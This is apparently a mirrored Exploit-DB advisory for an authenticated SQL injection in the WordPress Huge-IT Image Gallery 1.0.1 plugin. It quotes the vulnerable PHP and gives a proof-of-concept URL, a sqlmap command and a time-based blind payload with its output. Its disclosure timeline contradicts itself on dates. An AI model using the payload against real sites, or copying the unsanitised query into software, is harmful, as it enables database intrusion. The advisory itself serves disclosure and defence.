WordPress Plugin Huge-IT Image Gallery 1.0.1 – (Authenticated) SQL Injection - 体验盒子

作者： Claudio Viviani

日期： 2014-09-02

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/34524/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

######################

# Exploit Title : WordPress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://huge-it.com/

# Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip

Mirror Link : https://mega.co.nz/#!3EoUzSQI!yrl75XQsp1ggxDCjW-wq7yUxLdbLu0WHPNFcJAxJOHs

# Date : 2014-08-25

# Tested on : Windows 7 / Mozilla Firefox

# Linux / Mozilla Firefox

# Linux / sqlmap 1.0-dev-5b2ded0

######################

# Location :

http://localhost/wp-content/plugins/gallery-images/admin/gallery_func.php

######################

# Vulnerable code :

function editgallery($id)

{

global $wpdb;

if(isset($_GET["removeslide"])){

if($_GET["removeslide"] != ''){

$wpdb->query("DELETE FROM ".$wpdb->prefix."huge_itgallery_imagesWHERE id = ".$_GET["removeslide"]." ");

}

######################

# PoC Exploit:

http://localhost/wordpress/wp-admin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=1 and 1=2

# Exploit Code via sqlmap:

sqlmap --cookie="INSERT_WORDPRESS_COOKIE_HERE" -u "http://localhost/wordpress/wp-admin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=1" \

-p removeslide --dbms=mysql --level 3

[20:38:20] [INFO] GET parameter 'removeslide' is 'MySQL >= 5.0 time-based blind - Parameter replace' injectable

...

---

Place: GET

Parameter: removeslide

Type: AND/OR time-based blind

Title: MySQL >= 5.0 time-based blind - Parameter replace

Payload: page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=(SELECT (CASE WHEN (5440=5440) THEN SLEEP(5) ELSE 5440*(SELECT 5440 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))

---

# PoC Video:

https://www.youtube.com/watch?v=gAmb0_o3ZUc

######################

# Vulnerability Disclosure Timeline:

2014-08-25:Discovered vulnerability

2014-08-26:Vendor Notification (Web Customers Service Form)

2014-08-26:No Response/Feedback

2014-08-01:Plugin version 1.0.1 released without fix

2014-08-02:Public Disclosure

#####################

Discovered By : Claudio Viviani

http://www.homelab.it

info@homelab.it

homelabit@protonmail.ch

https://www.facebook.com/homelabit

https://twitter.com/homelabit

https://plus.google.com/+HomelabIt1/

https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################